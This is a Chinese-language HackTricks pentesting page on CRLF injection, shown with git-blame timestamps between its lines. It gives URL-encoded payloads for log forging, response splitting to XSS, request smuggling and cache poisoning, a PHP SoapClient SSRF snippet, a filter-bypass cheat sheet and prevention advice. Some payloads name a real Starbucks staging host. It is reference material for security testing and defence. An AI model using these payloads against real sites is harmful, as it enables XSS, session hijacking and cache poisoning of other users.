2023-12-26 02:11:12 +00:00
# CRLF (%0D%0A) 注入
2022-04-28 16:01:33 +00:00
< details >
2023-12-31 04:43:12 +00:00
< summary > < strong > 从零到英雄学习 AWS 黑客技术< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-31 04:43:12 +00:00
支持 HackTricks 的其他方式:
* 如果您想在 **HackTricks 中看到您的公司广告** 或 **下载 HackTricks 的 PDF** ,请查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
* 获取 [**官方 PEASS & HackTricks 商品** ](https://peass.creator-spring.com )
* 发现 [**PEASS 家族** ](https://opensea.io/collection/the-peass-family ),我们独家的 [**NFT 集合** ](https://opensea.io/collection/the-peass-family )
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram 群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上 **关注** 我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2023-12-31 04:43:12 +00:00
< img src = "../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" data-size = "original" >
2022-05-24 00:07:19 +00:00
2023-12-31 04:43:12 +00:00
如果您对 **黑客职业** 感兴趣并且想要黑入不可黑的系统 - **我们正在招聘!** (_需要流利的波兰语书写和口语_).
2022-04-28 16:01:33 +00:00
2022-05-24 00:07:19 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
2023-12-26 02:11:12 +00:00
## 什么是 CRLF?
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
当浏览器向 web 服务器发送请求时, web 服务器会回复一个包含 HTTP 响应头和实际网站内容的响应, 即响应体。HTTP 头和 HTML 响应(网站内容)由特定的特殊字符组合分隔,即回车符和换行符。简称它们为 CRLF。
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
web 服务器使用 CRLF 来理解何时开始新的 HTTP 头以及另一个结束。CRLF 还可以告诉 web 应用程序或用户文件或文本块中新行的开始。CRLF 字符是标准的 HTTP/1.1 消息,因此它被任何类型的 web 服务器使用,包括 Apache、Microsoft IIS 和所有其他服务器。\
2023-12-26 02:11:12 +00:00
来自 [https://www.netsparker.com/blog/web-security/crlf-http-header/# ](https://www.netsparker.com/blog/web-security/crlf-http-header/ )
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
### 什么是 CRLF 注入漏洞?
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
在 CRLF 注入漏洞攻击中, 攻击者将回车符和换行符插入用户输入, 以欺骗服务器、web 应用程序或用户认为一个对象已终止而另一个已开始。因此, CRLF 序列本身不是恶意字符,但它们可以用于恶意意图,例如 HTTP 响应分割等。
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
## 在 web 应用程序中的 CRLF 注入
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
在 web 应用程序中, CRLF 注入可能会产生严重影响,这取决于应用程序如何处理单个项目。影响可能从信息泄露到代码执行不等,直接影响 web 应用程序安全漏洞。实际上, CRLF 注入攻击可能对 web 应用程序产生非常严重的后果,尽管它从未被列入 OWASP Top 10 列表。例如,也可以像下面的示例中解释的那样操纵管理面板中的日志文件。
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
#### 在日志文件中的 CRLF 注入示例
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
想象一个在管理面板中的日志文件,输出流模式为 IP - 时间 - 访问路径,如下所示:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
123.123.123.123 - 08:15 - /index.php?page=home
```
2023-12-31 04:43:12 +00:00
```markdown
如果攻击者能够将CRLF字符注入HTTP请求中, 他就能改变输出流并伪造日志条目。他可以将web应用程序的响应更改为类似以下内容:
```
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/index.php?page=home& %0d%0a127.0.0.1 - 08:15 - /index.php?page=home& restrictedaction=edit
```
2023-12-26 02:11:12 +00:00
```
%0d和%0a是CR和LF的URL编码形式。因此, 在攻击者插入这些字符且应用程序显示它们之后, 日志条目将如下所示:
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
IP - 时间 - 访问路径
2021-10-18 11:21:18 +00:00
```
2023-12-26 02:11:12 +00:00
```
2020-07-15 15:43:14 +00:00
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home& restrictedaction=edit
```
2023-12-26 02:11:12 +00:00
```markdown
2023-12-31 04:43:12 +00:00
因此, 通过利用CRLF注入漏洞, 攻击者可以在日志文件中伪造条目, 以掩盖他自己的恶意行为。攻击者实际上正在进行页面劫持并修改响应。例如, 想象一个场景, 攻击者拥有管理员密码, 并执行了只有管理员才能使用的restrictedaction参数。
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
问题在于, 如果管理员注意到一个未知IP使用了restrictedaction参数, 会意识到有些不对劲。然而, 由于现在看起来像是由localhost( 因此可能是由有权访问服务器的人, 如管理员) 发出的命令, 它看起来并不可疑。
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
从%0d%0a开始的整个查询部分将被服务器作为一个参数处理。之后有另一个& 符号, 带有参数restrictedaction, 服务器将其解析为另一个参数。实际上, 这将是与以下查询相同的:
2023-12-26 02:11:12 +00:00
```
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/index.php?page=home& restrictedaction=edit
```
2023-12-31 04:43:12 +00:00
### HTTP响应拆分
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
#### 描述
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
由于HTTP响应的头部和正文是由CRLF字符分隔的, 攻击者可以尝试注入这些字符。CRLFCRLF的组合会告诉浏览器头部结束, 正文开始。这意味着攻击者现在能够在响应正文中写入数据, 也就是存储html代码的地方。这可能导致跨站脚本攻击漏洞。
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
#### 导致XSS的HTTP响应拆分示例
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
想象一个应用程序设置了一个自定义头部,例如:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
X-Your-Name: Bob
```
2023-12-26 02:11:12 +00:00
```markdown
2023-12-31 04:43:12 +00:00
头部的值是通过一个名为“name”的get参数设置的。如果没有URL编码, 并且值直接反映在头部内, 攻击者可能能够插入上述的CRLFCRLF组合, 告诉浏览器请求体的开始。这样, 他就能够插入数据, 例如XSS载荷:
2023-12-26 02:11:12 +00:00
```
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
?name=Bob%0d%0a%0d%0a< script > alert ( document . domain ) < / script >
```
2023-12-26 02:11:12 +00:00
上述操作将在被攻击域的上下文中显示一个警告窗口。
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
#### 一个导致重定向的HTTP响应分割的例子
2020-07-15 15:43:14 +00:00
{% embed url="https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62" %}
2023-12-26 02:11:12 +00:00
浏览至:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/%0d%0aLocation:%20http://myweb.com
```
2023-12-26 02:11:12 +00:00
服务器响应的头部为:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Location: http://myweb.com
```
2023-12-26 02:11:12 +00:00
**其他示例:(来源于** [**https://www.acunetix.com/websitesecurity/crlf-injection/** ](https://www.acunetix.com/websitesecurity/crlf-injection/ )**)**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
2023-08-03 19:12:22 +00:00
#### 在URL路径中
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
您可以将有效载荷**发送到URL路径内**,以控制服务器的**响应**:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
```
2023-12-26 02:11:12 +00:00
```markdown
2021-04-17 15:19:39 +00:00
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
2023-08-03 19:12:22 +00:00
### HTTP头注入
2021-04-17 15:20:44 +00:00
2023-08-03 19:12:22 +00:00
#### 描述
2021-04-17 15:20:44 +00:00
2023-12-31 04:43:12 +00:00
通过利用CRLF注入, 攻击者也可以插入HTTP头, 这可能用于击败安全机制, 如浏览器的XSS过滤器或同源策略。这允许攻击者获得敏感信息, 如CSRF令牌。他还可以设置cookie, 这可能通过记录受害者在攻击者的账户中登录或通过利用其他不可利用的[cross-site scripting (XSS) vulnerabilities](https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/)来被利用。
2021-04-17 15:20:44 +00:00
2023-12-26 02:11:12 +00:00
#### 利用HTTP头注入提取敏感数据的示例
2021-04-17 15:20:44 +00:00
2023-12-26 02:11:12 +00:00
如果攻击者能够注入激活CORS( 跨源资源共享) 的HTTP头, 他可以使用javascript访问本由SOP( 同源策略) 保护的资源, SOP阻止不同来源的站点相互访问。
2021-04-17 15:19:39 +00:00
2023-12-31 04:43:12 +00:00
### SSRF中的新HTTP请求
2021-04-17 15:19:39 +00:00
2023-12-31 04:43:12 +00:00
利用CRLF注入, 你可以**制作一个新的HTTP请求并注入它**。\
2023-12-26 02:11:12 +00:00
一个很好的例子可以使用PHP中的`SoapClient`反序列化小工具来完成。这个类对于`user_agent`参数内的**CRLF是**容易受到攻击的,允许**插入新的头和正文内容**。然而,你甚至可以利用这个漏洞来**注入一个新的HTTP请求: **
```
2021-04-17 15:19:39 +00:00
```php
2023-08-03 19:12:22 +00:00
$target = 'http://127.0.0.1:9090/test';
2021-04-17 15:19:39 +00:00
$post_string = 'variable=post value';
$crlf = array(
2023-08-03 19:12:22 +00:00
'POST /proxy HTTP/1.1',
'Host: local.host.htb',
'Cookie: PHPSESSID=[PHPSESSID]',
'Content-Type: application/x-www-form-urlencoded',
'Content-Length: '.(string)strlen($post_string),
"\r\n",
$post_string
2021-04-17 15:19:39 +00:00
);
$client = new SoapClient(null,
2023-08-03 19:12:22 +00:00
array(
'uri'=>$target,
'location'=>$target,
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
)
2021-04-17 15:19:39 +00:00
);
#Put a nc listening in port 9090
$client->__soapCall("test", []);
```
2023-12-26 02:11:12 +00:00
### 头注入到请求走私
2020-07-15 15:43:14 +00:00
2023-12-26 02:11:12 +00:00
您可以注入关键头部,确保**后端在响应初始请求后保持连接开放**:
2022-10-05 09:28:25 +00:00
```
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
```
2023-12-26 02:11:12 +00:00
然后,**指定第二个请求**。这里有一个**经典的**[**请求走私**](http-request-smuggling/),服务器在注入后附加了**额外的** **头部/正文** 。
2023-12-31 04:43:12 +00:00
以下是跨用户利用的两个选项之一。
2022-10-05 09:28:25 +00:00
2023-12-31 04:43:12 +00:00
指定一个**恶意前缀**来污染下一个用户的请求或网络缓存:
2022-10-05 09:28:25 +00:00
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
2023-12-31 04:43:12 +00:00
或者制作我们的前缀与尾随垃圾结合,创建一个完整的第二个请求以触发**响应队列污染**。
2022-10-05 09:28:25 +00:00
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
2023-12-31 04:43:12 +00:00
有关此技术和潜在问题的更多信息[**请查看原始来源**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)。
2022-10-05 09:28:25 +00:00
2023-12-26 02:11:12 +00:00
### Memcache 注入
2023-02-16 13:29:30 +00:00
2023-12-31 04:43:12 +00:00
Memcache 是一个**使用明文协议的键值存储**。更多信息请参见:
2023-02-16 13:29:30 +00:00
{% content-ref url="../network-services-pentesting/11211-memcache/" %}
[11211-memcache ](../network-services-pentesting/11211-memcache/ )
{% endcontent-ref %}
2023-12-31 04:43:12 +00:00
如果一个平台正在从**HTTP请求中获取数据, 并在未经消毒的情况下使用它来对**memcache**服务器进行**请求**,攻击者可以滥用这种行为来**注入新的memcache命令**。
2023-02-16 13:29:30 +00:00
2023-12-31 04:43:12 +00:00
例如, 在最初发现的漏洞中, 缓存键被用来返回用户应该连接的IP和端口, 攻击者能够**注入memcache命令**,这将**污染** **缓存以将受害者的详细信息** (包括用户名和密码)发送到攻击者的服务器:
2023-02-16 13:29:30 +00:00
2023-08-31 16:02:56 +00:00
< figure > < img src = "../.gitbook/assets/image (6) (1) (4).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-16 13:29:30 +00:00
2023-12-31 04:43:12 +00:00
此外, 研究人员还发现, 他们可以解同步memcache响应, 将攻击者的ip和端口发送给那些攻击者不知道电子邮件的用户:
2023-02-16 13:29:30 +00:00
2023-06-06 21:42:32 +00:00
< figure > < img src = "../.gitbook/assets/image (40).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-06-06 22:57:49 +00:00
< figure > < img src = "../.gitbook/assets/image (39).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-12-26 02:11:12 +00:00
**要获取完整信息,请阅读**[**原始报告**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)\*\*\*\*
2023-02-16 13:29:30 +00:00
2023-12-31 04:43:12 +00:00
## CRLF注入漏洞的影响
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
CRLF注入的影响各不相同, 还包括所有跨站脚本到信息泄露的影响。它还可以禁用某些安全限制, 如受害者浏览器中的XSS过滤器和同源策略, 使他们容易受到恶意攻击。
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
### 如何在Web应用程序中预防CRLF / HTTP头注入
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
最佳预防技术是不要直接在响应头中使用用户输入。如果这不可能, 您应该始终使用函数来编码CRLF特殊字符。另一个良好的Web应用程序安全最佳实践是将您的编程语言更新到不允许在设置HTTP头的函数中注入CR和LF的版本。
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
### 备忘单
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
1. HTTP Response Splitting
2021-06-23 17:08:03 +00:00
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
2020-07-15 15:43:14 +00:00
2. CRLF chained with Open Redirect
2023-08-03 19:12:22 +00:00
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
2020-07-15 15:43:14 +00:00
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (< )
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
```
2023-12-16 14:32:12 +00:00
## 自动化工具
2020-09-11 09:44:53 +00:00
2023-12-16 14:32:12 +00:00
* [https://github.com/Raghavd3v/CRLFsuite ](https://github.com/Raghavd3v/CRLFsuite )
* [https://github.com/dwisiswant0/crlfuzz ](https://github.com/dwisiswant0/crlfuzz )
2020-09-11 09:44:53 +00:00
2023-08-03 19:12:22 +00:00
## 暴力破解检测列表
2021-06-27 21:56:13 +00:00
2023-12-16 14:32:12 +00:00
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt ](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt )
2021-06-27 21:56:13 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2020-07-15 15:43:14 +00:00
2022-04-05 22:24:52 +00:00
* [**https://www.acunetix.com/websitesecurity/crlf-injection/** ](https://www.acunetix.com/websitesecurity/crlf-injection/ )
2023-02-16 13:29:30 +00:00
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning** ](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning )
2022-04-28 16:01:33 +00:00
2023-12-31 04:43:12 +00:00
< img src = "../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" data-size = "original" >
2022-05-24 00:07:19 +00:00
2023-12-26 02:11:12 +00:00
如果您对**黑客职业**感兴趣,并且想要黑进那些不可黑的系统 - **我们正在招聘!** ( _需要流利的波兰语书写和口语_) 。
2022-05-24 00:07:19 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
2022-04-28 16:01:33 +00:00
< details >
2023-12-31 04:43:12 +00:00
< summary > < strong > 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > 从零开始学习AWS黑客技术! < / strong > < / summary >
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2023-12-31 04:43:12 +00:00
* 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2023-12-26 02:11:12 +00:00
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
2023-12-31 04:43:12 +00:00
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来**分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >